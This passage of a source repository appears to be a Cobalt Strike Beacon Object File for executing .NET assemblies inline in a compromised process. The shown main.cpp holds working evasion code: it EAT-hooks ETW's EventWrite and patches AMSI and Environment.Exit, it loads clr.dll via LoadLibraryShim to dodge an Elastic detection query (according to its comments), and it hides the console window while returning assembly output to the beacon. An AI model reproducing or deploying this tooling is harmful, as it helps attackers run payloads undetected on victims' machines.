flags); 28 | WINBASEAPI int __cdecl MSVCRT$_dup2( int fd1, int fd2 ); 29 | WINBASEAPI int __cdecl MSVCRT$_close(int fd); 30 | WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str); 31 | WINBASEAPI int MSVCRT$_vsnwprintf_s(wchar_t *dest, size_t destsz, size_t count, const wchar_t *format, va_list argptr); // https://www.educative.io/answers/what-is-vsnwprintfs-in-c 32 | //KERNEL32 33 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID); 34 | WINBOOL WINAPI KERNEL32$GetModuleInformation(HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb); 35 | WINBASEAPI WINBOOL WINAPI KERNEL32$FreeConsole(VOID); 36 | WINBASEAPI DWORD WINAPI KERNEL32$QueueUserAPC (PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData); 37 | WINBASEAPI WINBOOL WINAPI KERNEL32$ReadConsoleA(HANDLE hConsoleInput,LPVOID lpBuffer,DWORD nNumberOfCharsToRead,LPDWORD lpNumberOfCharsRead,LPVOID lpReserved); 38 | typedef VOID* HPCON; 39 | WINBASEAPI HRESULT WINAPI KERNEL32$CreatePseudoConsole(COORD size, HANDLE hInput, HANDLE hOutput, DWORD dwFlags, HPCON* phPC); 40 | WINBASEAPI VOID WINAPI KERNEL32$ClosePseudoConsole(HPCON hPC); 41 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateConsoleScreenBuffer(DWORD dwDesiredAccess,DWORD dwShareMode,CONST SECURITY_ATTRIBUTES *lpSecurityAttributes,DWORD dwFlags,LPVOID lpScreenBufferData); 42 | WINBASEAPI WINBOOL WINAPI KERNEL32$SetConsoleActiveScreenBuffer(HANDLE hConsoleOutput); 43 | WINBASEAPI DWORD WINAPI KERNEL32$SleepEx(DWORD dwMilliseconds, WINBOOL bAlertable); 44 | WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentThreadId(VOID); 45 | WINBASEAPI WINBOOL WINAPI KERNEL32$SetThreadContext(HANDLE hThread, CONST CONTEXT *lpContext); 46 | WINBASEAPI WINBOOL WINAPI KERNEL32$GetThreadContext(HANDLE hThread, LPCONTEXT lpContext); 47 | WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName); 48 | WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler); 49 | WINBASEAPI ULONG WINAPI KERNEL32$RemoveVectoredExceptionHandler(PVOID Handle); 50 | WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR lpModuleName); 51 | WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName); 52 | WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject); 53 | WINBASEAPI int WINAPI KERNEL32$WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar); 54 | WINBASEAPI VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds); 55 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(VOID); 56 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 57 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); 58 | WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR lpString); 59 | WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str); 60 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 61 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateMailslotA(LPCSTR lpName, DWORD nMaxMessageSize, DWORD lReadTimeout, LPSECURITY_ATTRIBUTES lpSecurityAttributes); 62 | WINBASEAPI BOOL WINAPI KERNEL32$GetMailslotInfo(HANDLE hMailslot, LPDWORD lpMaxMessageSize, LPDWORD lpNextSize, LPDWORD lpMessageCount, LPDWORD lpReadTimeout); 63 | WINBASEAPI BOOL WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 64 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName); 65 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes); 66 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalFree(HGLOBAL hMem); 67 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect (PVOID, DWORD, DWORD, PDWORD); 68 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 69 | WINBASEAPI HWND WINAPI KERNEL32$GetConsoleWindow(void); 70 | WINBASEAPI BOOL WINAPI KERNEL32$AllocConsole(void); 71 | WINBASEAPI HANDLE WINAPI KERNEL32$GetStdHandle(DWORD nStdHandle); 72 | WINBASEAPI WINBOOL WINAPI KERNEL32$SetStdHandle (DWORD nStdHandle, HANDLE hHandle); 73 | WINBASEAPI WINBOOL WINAPI KERNEL32$CreatePipe(PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize); 74 | //SHELL32 75 | WINBASEAPI LPWSTR* WINAPI SHELL32$CommandLineToArgvW(LPCWSTR lpCmdLine, int* pNumArgs); 76 | //MSCOREE 77 | WINBASEAPI HRESULT WINAPI MSCOREE$CLRCreateInstance(REFCLSID clsid, REFIID riid, LPVOID* ppInterface); 78 | WINBASEAPI HRESULT WINAPI MSCOREE$LoadLibraryShim(LPCWSTR,LPCWSTR,LPVOID,HMODULE*); 79 | //OLEAUT32 80 | WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreateVector(VARTYPE vt, LONG lLbound, ULONG cElements); 81 | WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreate(VARTYPE vt, UINT cDims, SAFEARRAYBOUND* rgsabound); 82 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY* psa, void HUGEP** ppvData); 83 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY* psa); 84 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayPutElement(SAFEARRAY* psa, LONG* rgIndices, void* pv); 85 | WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY* psa); 86 | WINBASEAPI HRESULT WINAPI OLEAUT32$VariantClear(VARIANTARG* pvarg); 87 | WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR* psz); 88 | //USER32 89 | WINUSERAPI WINBOOL WINAPI USER32$ShowWindow(HWND hWnd,int nCmdShow); 90 | WINUSERAPI int WINAPI USER32$MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType); 91 | //EXTRA 92 | 93 | 94 | typedef struct _AppDomain IAppDomain; 95 | typedef struct _Assembly IAssembly; 96 | typedef struct _Type IType; 97 | typedef struct _Binder IBinder; 98 | typedef struct _MethodInfo IMethodInfo; 99 | typedef struct _iobuf FILE; 100 | 101 | static GUID xIID_AppDomain = { 0x05F696DC, 0x2B29, 0x3663, {0xAD, 0x8B, 0xC4,0x38, 0x9C, 0xF2, 0xA7, 0x13} }; 102 | static GUID xCLSID_CLRMetaHost = { 0x9280188d, 0xe8e, 0x4867, {0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde} }; 103 | static GUID xIID_ICLRMetaHost = { 0xD332DB9E, 0xB9B3, 0x4125, {0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16} }; 104 | static GUID xIID_ICLRRuntimeInfo = { 0xBD39D1D2, 0xBA2F, 0x486a, {0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91} }; 105 | static GUID xIID_ICorRuntimeHost = { 0xcb2f6722, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e} }; 106 | static GUID xCLSID_CorRuntimeHost = { 0xcb2f6723, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e} }; 107 | static GUID xCLSID_ICLRRuntimeHost = { 0x90F1A06E, 0x7712, 0x4762, {0x86, 0xB5, 0x7A, 0x5E, 0xBA, 0x6B, 0xDB, 0x02} }; 108 | static GUID xIID_ICLRRuntimeHost = { 0x90F1A06C, 0x7712, 0x4762, {0x86, 0xB5, 0x7A, 0x5E, 0xBA, 0x6B, 0xDB, 0x02 }}; 109 | static GUID xIID_ICLRAssemblyIdentityManager = { 0x15f0a9da, 0x3ff6, 0x4393, {0x9d, 0xa9, 0xfd, 0xfd, 0x28, 0x4e, 0x69, 0x72} }; 110 | static GUID xIID_IAssemblyName = { 0xB42B6AAC, 0x317E, 0x34D5, {0x9F, 0xA9, 0x09, 0x3B, 0xB4, 0x16, 0x0C, 0x50 } }; 111 | 112 | /* 113 | typedef enum _BindingFlags { 114 | BindingFlags_Default = 0, 115 | BindingFlags_IgnoreCase = 1, 116 | BindingFlags_DeclaredOnly = 2, 117 | BindingFlags_Instance = 4, 118 | BindingFlags_Static = 8, 119 | BindingFlags_Public = 16, 120 | BindingFlags_NonPublic = 32, 121 | BindingFlags_InvokeMethod = 256, 122 | BindingFlags_CreateInstance = 512, 123 | BindingFlags_GetField = 1024, 124 | BindingFlags_SetField = 2048, 125 | BindingFlags_GetProperty = 4096, 126 | BindingFlags_SetProperty = 8192, 127 | BindingFlags_ExactBinding = 65536, 128 | BindingFlags_SuppressChangeType = 131072, 129 | BindingFlags_OptionalParamBinding = 262144, 130 | BindingFlags_IgnoreReturn = 16777216 131 | } BindingFlags; 132 | */ 133 | 134 | 135 | 136 | typedef struct _UNICODE_STRING { 137 | USHORT Length; 138 | USHORT MaximumLength; 139 | PWSTR Buffer; 140 | } UNICODE_STRING, *PUNICODE_STRING; 141 | 142 | typedef struct _PEB_LDR_DATA { 143 | BYTE Reserved1[8]; 144 | PVOID Reserved2[3]; 145 | LIST_ENTRY InMemoryOrderModuleList; 146 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 147 | 148 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 149 | USHORT Flags; 150 | USHORT Length; 151 | ULONG TimeStamp; 152 | UNICODE_STRING DosPath; 153 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 154 | 155 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 156 | ULONG MaximumLength; 157 | ULONG Length; 158 | ULONG Flags; 159 | ULONG DebugFlags; 160 | PVOID ConsoleHandle; 161 | ULONG ConsoleFlags; 162 | HANDLE StdInputHandle; 163 | HANDLE StdOutputHandle; 164 | HANDLE StdErrorHandle; 165 | UNICODE_STRING CurrentDirectoryPath; 166 | HANDLE CurrentDirectoryHandle; 167 | UNICODE_STRING DllPath; 168 | UNICODE_STRING ImagePathName; 169 | UNICODE_STRING CommandLine; 170 | PVOID Environment; 171 | ULONG StartingPositionLeft; 172 | ULONG StartingPositionTop; 173 | ULONG Width; 174 | ULONG Height; 175 | ULONG CharWidth; 176 | ULONG CharHeight; 177 | ULONG ConsoleTextAttributes; 178 | ULONG WindowFlags; 179 | ULONG ShowWindowFlags; 180 | UNICODE_STRING WindowTitle; 181 | UNICODE_STRING DesktopName; 182 | UNICODE_STRING ShellInfo; 183 | UNICODE_STRING RuntimeData; 184 | RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20]; 185 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 186 | 187 | typedef VOID (WINAPI *PPS_POST_PROCESS_INIT_ROUTINE)(VOID); 188 | 189 | typedef struct _PEB { 190 | BYTE Reserved1[2]; 191 | BYTE BeingDebugged; 192 | BYTE Reserved2[1]; 193 | PVOID Reserved3[2]; 194 | PPEB_LDR_DATA Ldr; 195 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 196 | PVOID Reserved4[3]; 197 | PVOID AtlThunkSListPtr; 198 | PVOID Reserved5; 199 | ULONG Reserved6; 200 | PVOID Reserved7; 201 | ULONG Reserved8; 202 | ULONG AtlThunkSListPtr32; 203 | PVOID Reserved9[45]; 204 | BYTE Reserved10[96]; 205 | PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; 206 | BYTE Reserved11[128]; 207 | PVOID Reserved12[1]; 208 | ULONG SessionId; 209 | } PEB, *PPEB; 210 | 211 | typedef struct _KSYSTEM_TIME 212 | { 213 | ULONG LowPart; 214 | LONG High1Time; 215 | LONG High2Time; 216 | } KSYSTEM_TIME, *PKSYSTEM_TIME; 217 | 218 | typedef struct _KUSER_SHARED_DATA { 219 | ULONG TickCountLowDeprecated; 220 | ULONG TickCountMultiplier; 221 | KSYSTEM_TIME InterruptTime; 222 | KSYSTEM_TIME SystemTime; 223 | KSYSTEM_TIME TimeZoneBias; 224 | USHORT ImageNumberLow; 225 | USHORT ImageNumberHigh; 226 | WCHAR NtSystemRoot[260]; 227 | ULONG MaxStackTraceDepth; 228 | ULONG CryptoExponent; 229 | ULONG TimeZoneId; 230 | ULONG LargePageMinimum; 231 | ULONG AitSamplingValue; 232 | ULONG AppCompatFlag; 233 | ULONGLONG RNGSeedVersion; 234 | ULONG GlobalValidationRunlevel; 235 | LONG TimeZoneBiasStamp; 236 | ULONG NtBuildNumber; 237 | //NT_PRODUCT_TYPE NtProductType; 238 | BOOLEAN ProductTypeIsValid; 239 | BOOLEAN Reserved0[1]; 240 | USHORT NativeProcessorArchitecture; 241 | ULONG NtMajorVersion; 242 | ULONG NtMinorVersion; 243 | //BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX]; 244 | ULONG Reserved1; 245 | ULONG Reserved3; 246 | ULONG TimeSlip; 247 | //ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture; 248 | ULONG BootId; 249 | LARGE_INTEGER SystemExpirationDate; 250 | ULONG SuiteMask; 251 | BOOLEAN KdDebuggerEnabled; 252 | union { 253 | UCHAR MitigationPolicies; 254 | struct { 255 | UCHAR NXSupportPolicy : 2; 256 | UCHAR SEHValidationPolicy : 2; 257 | UCHAR CurDirDevicesSkippedForDlls : 2; 258 | UCHAR Reserved : 2; 259 | }; 260 | }; 261 | USHORT CyclesPerYield; 262 | ULONG ActiveConsoleId; 263 | ULONG DismountCount; 264 | ULONG ComPlusPackage; 265 | ULONG LastSystemRITEventTickCount; 266 | ULONG NumberOfPhysicalPages; 267 | BOOLEAN SafeBootMode; 268 | union { 269 | UCHAR VirtualizationFlags; 270 | struct { 271 | UCHAR ArchStartedInEl2 : 1; 272 | UCHAR QcSlIsSupported : 1; 273 | }; 274 | }; 275 | UCHAR Reserved12[2]; 276 | union { 277 | ULONG SharedDataFlags; 278 | struct { 279 | ULONG DbgErrorPortPresent : 1; 280 | ULONG DbgElevationEnabled : 1; 281 | ULONG DbgVirtEnabled : 1; 282 | ULONG DbgInstallerDetectEnabled : 1; 283 | ULONG DbgLkgEnabled : 1; 284 | ULONG DbgDynProcessorEnabled : 1; 285 | ULONG DbgConsoleBrokerEnabled : 1; 286 | ULONG DbgSecureBootEnabled : 1; 287 | ULONG DbgMultiSessionSku : 1; 288 | ULONG DbgMultiUsersInSessionSku : 1; 289 | ULONG DbgStateSeparationEnabled : 1; 290 | ULONG SpareBits : 21; 291 | } DUMMYSTRUCTNAME2; 292 | } DUMMYUNIONNAME2; 293 | ULONG DataFlagsPad[1]; 294 | ULONGLONG TestRetInstruction; 295 | LONGLONG QpcFrequency; 296 | ULONG SystemCall; 297 | ULONG Reserved2; 298 | ULONGLONG FullNumberOfPhysicalPages; 299 | ULONGLONG SystemCallPad[1]; 300 | union { 301 | KSYSTEM_TIME TickCount; 302 | ULONG64 TickCountQuad; 303 | struct { 304 | ULONG ReservedTickCountOverlay[3]; 305 | ULONG TickCountPad[1]; 306 | } DUMMYSTRUCTNAME; 307 | } DUMMYUNIONNAME3; 308 | ULONG Cookie; 309 | ULONG CookiePad[1]; 310 | LONGLONG ConsoleSessionForegroundProcessId; 311 | ULONGLONG TimeUpdateLock; 312 | ULONGLONG BaselineSystemTimeQpc; 313 | ULONGLONG BaselineInterruptTimeQpc; 314 | ULONGLONG QpcSystemTimeIncrement; 315 | ULONGLONG QpcInterruptTimeIncrement; 316 | UCHAR QpcSystemTimeIncrementShift; 317 | UCHAR QpcInterruptTimeIncrementShift; 318 | USHORT UnparkedProcessorCount; 319 | ULONG EnclaveFeatureMask[4]; 320 | ULONG TelemetryCoverageRound; 321 | USHORT UserModeGlobalLogger[16]; 322 | ULONG ImageFileExecutionOptions; 323 | ULONG LangGenerationCount; 324 | ULONGLONG Reserved4; 325 | ULONGLONG InterruptTimeBias; 326 | ULONGLONG QpcBias; 327 | ULONG ActiveProcessorCount; 328 | UCHAR ActiveGroupCount; 329 | UCHAR Reserved9; 330 | union { 331 | USHORT QpcData; 332 | struct { 333 | UCHAR QpcBypassEnabled; 334 | UCHAR QpcReserved; 335 | }; 336 | }; 337 | LARGE_INTEGER TimeZoneBiasEffectiveStart; 338 | LARGE_INTEGER TimeZoneBiasEffectiveEnd; 339 | XSTATE_CONFIGURATION XState; 340 | KSYSTEM_TIME FeatureConfigurationChangeStamp; 341 | ULONG Spare; 342 | ULONG64 UserPointerAuthMask; 343 | XSTATE_CONFIGURATION XStateArm64; 344 | ULONG Reserved10[210]; 345 | } KUSER_SHARED_DATA, *PKUSER_SHARED_DATA; 346 | 347 | } 348 | -------------------------------------------------------------------------------- /src/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "mscorlib.h" 7 | #include "metahost.h" 8 | #include "beacon.h" 9 | #include "inline-ea.h" 10 | #include "fcntl.h" 11 | 12 | 13 | extern "C" { 14 | 15 | #pragma warning(disable : 4996) 16 | 17 | BOOL Executedotnet(PBYTE AssemblyBytes, ULONG AssemblySize, LPCWSTR wAssemblyArguments, LPSTR* OutputBuffer, PULONG OutputLength, BOOL patchExitflag, BOOL patchAmsiflag); 18 | BOOL FindVersion(void* assembly, int length); 19 | BOOL PatchAmsiScanBuffer(HMODULE hModule); 20 | DWORD EATHook(HMODULE mod, char* FN, VOID* HA, VOID** OA); 21 | BOOL DummyFunction(void); 22 | BOOL patchExit(ICorRuntimeHost* runtimeHost); 23 | 24 | int go(char* args, ULONG length) 25 | { 26 | /* Get args from Aggressor Script */ 27 | datap parser; 28 | BeaconDataParse(&parser, args, length); 29 | PBYTE assemblyBytes = (PBYTE)BeaconDataExtract(&parser, NULL); 30 | DWORD assemblyByteLen = (DWORD)BeaconDataInt(&parser); 31 | LPCWSTR assemblyArguments = (wchar_t*)BeaconDataExtract(&parser, NULL); 32 | BOOL patchExitflag = BeaconDataInt(&parser); 33 | BOOL patchAmsiflag = BeaconDataInt(&parser); 34 | BOOL patchEtwflag = BeaconDataInt(&parser); 35 | 36 | /* Allocate memory for output of .net assembly */ 37 | LPSTR OutputBuffer = (LPSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, 0x100000); 38 | ULONG OutputLength = 0; 39 | 40 | /* Bypass ETW with EAT Hooking */ 41 | if (patchEtwflag != 0) { 42 | BeaconPrintf(CALLBACK_OUTPUT, "EAT Hooking ETW"); 43 | HMODULE advapi = KERNEL32$LoadLibraryA("advapi32.dll"); 44 | PVOID originalFunc = (PVOID)KERNEL32$GetProcAddress(advapi, "EventWrite"); 45 | if (!EATHook(advapi, const_cast("EventWrite"), reinterpret_cast(&DummyFunction), reinterpret_cast(&originalFunc))) 46 | return -1; 47 | } 48 | 49 | /* Execute inline dotnet */ 50 | Executedotnet(assemblyBytes, assemblyByteLen, assemblyArguments, &OutputBuffer, &OutputLength, patchExitflag, patchAmsiflag); 51 | 52 | /* Print results */ 53 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Assembly Output [%lu bytes]:\n%s", OutputLength, OutputBuffer); 54 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, OutputBuffer); 55 | 56 | return 0; 57 | } 58 | 59 | BOOL Executedotnet(PBYTE AssemblyBytes, ULONG AssemblySize, LPCWSTR wAssemblyArguments, LPSTR* OutputBuffer, ULONG* OutputLength, BOOL patchExitflag, BOOL patchAmsiflag) // Heavily modified but credits to Maldev Academy and Anthemtotheego for the skeleton where I could then work on bypasses 60 | { 61 | /* Debugging shenanigans 62 | BeaconPrintf(CALLBACK_OUTPUT, "Assembly Bytes Address: 0x%p", AssemblyBytes); 63 | BeaconPrintf(CALLBACK_OUTPUT, "Output Buffer Address: 0x%p", OutputBuffer); 64 | BeaconPrintf(CALLBACK_OUTPUT, "OutputLength Address: 0x%p", OutputLength); 65 | BeaconPrintf(CALLBACK_OUTPUT, "Output Length: %lu", *OutputLength); 66 | BeaconPrintfW(CALLBACK_OUTPUT, L"Arguments: %s", wAssemblyArguments); 67 | */ 68 | 69 | // --------- Here we initialize the CLR --------- 70 | HRESULT HResult = NULL; 71 | ICLRMetaHost* metaHost = NULL; 72 | 73 | HResult = MSCOREE$CLRCreateInstance(xCLSID_CLRMetaHost, xIID_ICLRMetaHost, (PVOID*)&metaHost); // Spawns mscoreei.dll 74 | 75 | ICLRRuntimeInfo* runtimeInfo = NULL; 76 | LPCWSTR wVersion; 77 | if (FindVersion((void*)AssemblyBytes, AssemblySize)) 78 | { 79 | wVersion = L"v4.0.30319"; 80 | } 81 | else 82 | { 83 | wVersion = L"v2.0.50727"; 84 | } 85 | 86 | HResult = metaHost->GetRuntime(wVersion, xIID_ICLRRuntimeInfo, (PVOID*)&runtimeInfo); 87 | 88 | BOOL IsLoadable; 89 | HResult = runtimeInfo->IsLoadable(&IsLoadable); 90 | if (HResult != S_OK || !IsLoadable) 91 | { 92 | BeaconPrintf(CALLBACK_OUTPUT, "IsLoadable Failed!"); 93 | return FALSE; 94 | } 95 | 96 | ICorRuntimeHost* runtimeHost = NULL; // ICorRuntimeHost has CreateDomain while ICLRRuntimeHost doesnt. 97 | 98 | HMODULE phModDll = NULL; 99 | HRESULT hResult = MSCOREE$LoadLibraryShim(L"clr.dll", wVersion, NULL, &phModDll); // We LoadLibraryShim in order to have the callstack bypass Elastic's detection query. Once clr.dll is loaded, run GetInterface 100 | 101 | if (patchAmsiflag != 0) { 102 | BeaconPrintf(CALLBACK_OUTPUT, "Patching AMSI"); 103 | BOOL Patch = PatchAmsiScanBuffer(phModDll); 104 | if (!Patch) { 105 | BeaconPrintf(CALLBACK_OUTPUT, "Failed to patch AMSI"); 106 | return FALSE; 107 | } 108 | } 109 | 110 | HResult = runtimeInfo->GetInterface(xCLSID_CorRuntimeHost, xIID_ICorRuntimeHost, (PVOID*)&runtimeHost); // This will load clr.dll if we didn't LoadLibraryShim 111 | HResult = runtimeHost->Start(); 112 | 113 | 114 | // --------- Here we create our AppDomain and pass the .net assembly into it --------- 115 | LPCWSTR pFriendlyName = L"SecureDomain"; 116 | IUnknown* IUAppDomain = NULL; 117 | HResult = runtimeHost->CreateDomain((PWSTR)pFriendlyName, nullptr, &IUAppDomain); // Only accepts an IUnknown interface. Also, at the end we will unload the domain with this same ICorRuntimeHost interface 118 | 119 | _AppDomain* AppDomain = NULL; 120 | HResult = IUAppDomain->QueryInterface(xIID_AppDomain, (VOID**)&AppDomain); // Use the IUnknown interface's QueryInterface method to get a pointer to an interface we want; in our case _AppDomain AppDomain 121 | 122 | SAFEARRAYBOUND SafeArrayBound = { AssemblySize, 0 }; 123 | SAFEARRAY* SafeAssembly = OLEAUT32$SafeArrayCreate(VT_UI1, 1, &SafeArrayBound); // Create safe array because Load_3 requires it as a safe array. https://learn.microsoft.com/en-us/archive/msdn-magazine/2017/march/introducing-the-safearray-data-structure#creating-a-safe-array 124 | 125 | MSVCRT$memcpy(SafeAssembly->pvData, AssemblyBytes, AssemblySize); // now copy the bytes over into the safe array 126 | 127 | _Assembly* Assembly = NULL; 128 | HResult = AppDomain->Load_3(SafeAssembly, &Assembly); // Now using the AppDomain interface, load the specified assembly into the created appdomain (This will load amsi.dll) using the Load_3 method overload found in the mscorlib.h header file. 129 | if (HResult != S_OK) 130 | { 131 | BeaconPrintf(CALLBACK_OUTPUT, "[-] AppDomain->Load_3 Failed with Error: %lx", HResult); // This will fail if caught by AMSI 132 | } 133 | 134 | if (patchExitflag != 0) { 135 | BeaconPrintf(CALLBACK_OUTPUT, "Patching System.Environment.Exit"); 136 | if (!patchExit(runtimeHost)) 137 | return FALSE; 138 | } 139 | 140 | 141 | _MethodInfo* MethodInfo = NULL; 142 | HResult = Assembly->get_EntryPoint(&MethodInfo); 143 | 144 | SAFEARRAY* SafeExpected = { 0 }; 145 | HResult = MethodInfo->GetParameters(&SafeExpected); 146 | 147 | 148 | // --------- Here we create arguments to be passed to the assembly entry point method --------- 149 | SAFEARRAY* SafeArguments = {}; 150 | PWSTR* AssemblyArgv = {}; 151 | if (SafeExpected) 152 | { 153 | if (SafeExpected->cDims && SafeExpected->rgsabound[0].cElements) 154 | { 155 | 156 | ULONG AssemblyArgc = {}; 157 | VARIANT VariantArgv = {}; 158 | 159 | 160 | SafeArguments = OLEAUT32$SafeArrayCreateVector(VT_VARIANT, 0, 1); 161 | 162 | if (MSVCRT$wcslen(wAssemblyArguments)) 163 | { 164 | AssemblyArgv = SHELL32$CommandLineToArgvW(wAssemblyArguments, (PINT)&AssemblyArgc); 165 | } 166 | 167 | VariantArgv.parray = OLEAUT32$SafeArrayCreateVector(VT_BSTR, 0, AssemblyArgc); 168 | VariantArgv.vt = (VT_ARRAY | VT_BSTR); 169 | 170 | LONG Index = {}; 171 | for (Index = 0; Index < AssemblyArgc; Index++) 172 | { 173 | OLEAUT32$SafeArrayPutElement(VariantArgv.parray, &Index, OLEAUT32$SysAllocString(AssemblyArgv[Index])); 174 | } 175 | 176 | Index = 0; 177 | OLEAUT32$SafeArrayPutElement(SafeArguments, &Index, &VariantArgv); 178 | OLEAUT32$SafeArrayDestroy(VariantArgv.parray); 179 | } 180 | } 181 | 182 | 183 | // --------- Here we invoke the assembly and retrieve output from it --------- 184 | /* We create an anonymous pipe to redirect the current executed assembly's output into a pipe for us to catch and store into a buffer */ 185 | SECURITY_ATTRIBUTES SecurityAttr = {}; 186 | HANDLE IoPipeRead = {}; 187 | HANDLE IoPipeWrite = {}; 188 | SecurityAttr = { sizeof(SECURITY_ATTRIBUTES), nullptr, TRUE }; 189 | if (!(KERNEL32$CreatePipe(&IoPipeRead, &IoPipeWrite, nullptr, 0x100000))) { 190 | BeaconPrintf(CALLBACK_OUTPUT, "[-] CreatePipe Failed with Error: %lx", KERNEL32$GetLastError()); 191 | HResult = KERNEL32$GetLastError(); 192 | } 193 | 194 | /* This part was necessary in order to allocate a console from backed memory. I need to figure out how read output without allocating a console. */ 195 | KERNEL32$QueueUserAPC((PAPCFUNC)KERNEL32$AllocConsole, (HANDLE)-2, NULL); 196 | typedef NTSTATUS(NTAPI* myNtTestAlert)(); 197 | myNtTestAlert testAlert = (myNtTestAlert)(KERNEL32$GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert")); 198 | testAlert(); 199 | 200 | HWND ConHandle = {}; 201 | if ((ConHandle = KERNEL32$GetConsoleWindow())) { 202 | USER32$ShowWindow(ConHandle, SW_HIDE); // To conceal the console window, we apply ShowWindow with the SW_HIDE parameter 203 | } 204 | 205 | HANDLE BackupHandle = KERNEL32$GetStdHandle(STD_OUTPUT_HANDLE); 206 | KERNEL32$SetStdHandle(STD_OUTPUT_HANDLE, IoPipeWrite); // Then we set stdout to be directed to our anonymous pipe's write handle so it will be stored there and we can read from it later 207 | 208 | HResult = MethodInfo->Invoke_3(VARIANT(), SafeArguments, nullptr); // Now call entry point with the arguments using the Invoke_3 method overload found in the mscorlib.h header file. 209 | 210 | if (!KERNEL32$ReadFile(IoPipeRead, *OutputBuffer, 0x100000, OutputLength, nullptr)) { // Read from the pipe to capture the output 211 | BeaconPrintf(CALLBACK_OUTPUT, "[-] ReadFile Failed with Error: %lx", KERNEL32$GetLastError()); 212 | } 213 | 214 | // --------- From here on out we just clean up --------- 215 | if (BackupHandle) 216 | KERNEL32$SetStdHandle(STD_OUTPUT_HANDLE, BackupHandle); //restore original std handle from backup 217 | 218 | KERNEL32$CloseHandle(IoPipeRead); 219 | KERNEL32$CloseHandle(IoPipeWrite); 220 | KERNEL32$FreeConsole(); 221 | 222 | if (AssemblyArgv) { 223 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, AssemblyArgv); 224 | AssemblyArgv = nullptr; 225 | } 226 | 227 | if (SafeAssembly) { 228 | OLEAUT32$SafeArrayDestroy(SafeAssembly); 229 | SafeAssembly = nullptr; 230 | } 231 | 232 | if (SafeArguments) { 233 | OLEAUT32$SafeArrayDestroy(SafeArguments); 234 | SafeArguments = nullptr; 235 | } 236 | 237 | if (MethodInfo) 238 | MethodInfo->Release(); 239 | 240 | if (Assembly) 